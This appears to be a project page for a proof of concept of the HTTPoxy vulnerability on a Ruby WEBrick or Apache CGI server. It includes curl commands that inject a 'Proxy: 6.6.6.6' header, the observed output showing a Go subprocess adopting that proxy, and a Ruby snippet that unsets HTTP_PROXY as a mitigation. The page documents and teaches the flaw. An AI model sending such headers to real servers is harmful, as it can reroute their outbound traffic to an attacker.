Short Description
A contrived example of the HTTPoxy (https://httpoxy.org/) vulnerability for a Ruby WEBrick server
Full Description

Ruby HTTPoxy PoC (gordonchan/ruby-httpoxy)

A somewhat contrived example of the HTTPoxy vulnerability for a Ruby WEBrick server that is serving CGI scripts. Demonstrates:

  • WEBrick::HTTPRequest prefixes request header names with "HTTP_", and WEBrick::HTTPServlet::CGIHandler passes them to the CGI script's environment, so a Proxy request header becomes the HTTP_PROXY environment variable. Apache does the same.
  • Ruby net/http is not vulnerable as per URI::Generic#find_proxy.
  • But if the Ruby CGI script calls a system program that uses an affected HTTP client (e.g. Go net/http), the HTTP_PROXY environment variable will be respected and its value will be used for outbound HTTP requests. :(
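
A mitigation for the last point, as an added example that is not part of the original repository: unset HTTP_PROXY in the environment handed to child processes whenever the script is running under CGI. The helper names and the child Ruby process standing in for ./go-proxy-check are assumptions made for illustration.

```ruby
require "rbconfig"

# Constructed sample: the headers sent by the curl command in the Quick Start.
SAMPLE_HEADERS = { "Proxy" => "6.6.6.6", "User-Agent" => "curl/7.43.0" }.freeze

# Simplified model of the CGI (RFC 3875) mapping described above: each request
# header becomes an HTTP_* variable. Hypothetical helper, not WEBrick's code.
def cgi_meta_vars(headers)
  vars = { "REQUEST_METHOD" => "GET" } # a gateway sets this for every CGI request
  headers.each { |name, value| vars["HTTP_" + name.upcase.tr("-", "_")] = value }
  vars
end

# Environment overrides for a child process. Inside a CGI request, HTTP_PROXY
# is treated as client-supplied, so it is unset (nil) for the child.
# Outside CGI it is left alone, because there it is operator configuration.
def child_env_overrides(env)
  env.key?("REQUEST_METHOD") && env.key?("HTTP_PROXY") ? { "HTTP_PROXY" => nil } : {}
end

# Stand-in for the page's ./go-proxy-check: spawns a child Ruby process and
# returns the HTTP_PROXY value that child sees ("" when the variable is unset).
def proxy_seen_by_child(cgi_env, scrub:)
  env = scrub ? cgi_env.merge(child_env_overrides(cgi_env)) : cgi_env
  IO.popen(env, [RbConfig.ruby, "-e", "print ENV['HTTP_PROXY'].to_s"], &:read)
end

if __FILE__ == $PROGRAM_NAME
  cgi_env = cgi_meta_vars(SAMPLE_HEADERS)
  puts "child without scrub: #{proxy_seen_by_child(cgi_env, scrub: false).inspect}"
  puts "child with scrub:    #{proxy_seen_by_child(cgi_env, scrub: true).inspect}"
end
```

The same overrides hash can be passed as the first argument to system or Process.spawn, where a nil value also unsets the variable for the child.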

Quick Start:

$ ./server
$ curl -H "Proxy: 6.6.6.6" localhost:4000/ruby.cgi -v

With Docker:

$ docker run --rm -p 4000:4000 gordonchan/ruby-httpoxy
$ curl -H "Proxy: 6.6.6.6" $(docker-machine ip):4000/ruby.cgi -v

With Docker (Apache):

$ docker run --rm -p 80:80 gordonchan/ruby-apache-httpoxy
$ curl -H "Proxy: 6.6.6.6" $(docker-machine ip):80/ruby.cgi -v

Observed Output

*   Trying ::1...
* Connected to localhost (::1) port 4000 (#0)
> GET /ruby.cgi HTTP/1.1
> Host: localhost:4000
> User-Agent: curl/7.43.0
> Accept: */*
> Proxy: 6.6.6.6
>
< HTTP/1.1 200 OK
< Content-Type: text/html
< Server: WEBrick/1.3.1 (Ruby/2.3.0/2015-12-25)
< Date: Tue, 02 Aug 2016 11:42:57 GMT
< Content-Length: 409
< Connection: Keep-Alive
<
HTTP_PROXY env:
ENV['HTTP_PROXY']  > 6.6.6.6

net/http proxy check:
NONE!

`./go-proxy-check` (system command):
In Go Land (using net/http)
Proxy: http://6.6.6.6

Notes:

License

ruby-httpoxy is Copyright (c) 2016 Gordon Chan and is released under the MIT License. It is free software, and may be redistributed under the terms specified in the LICENSE file.
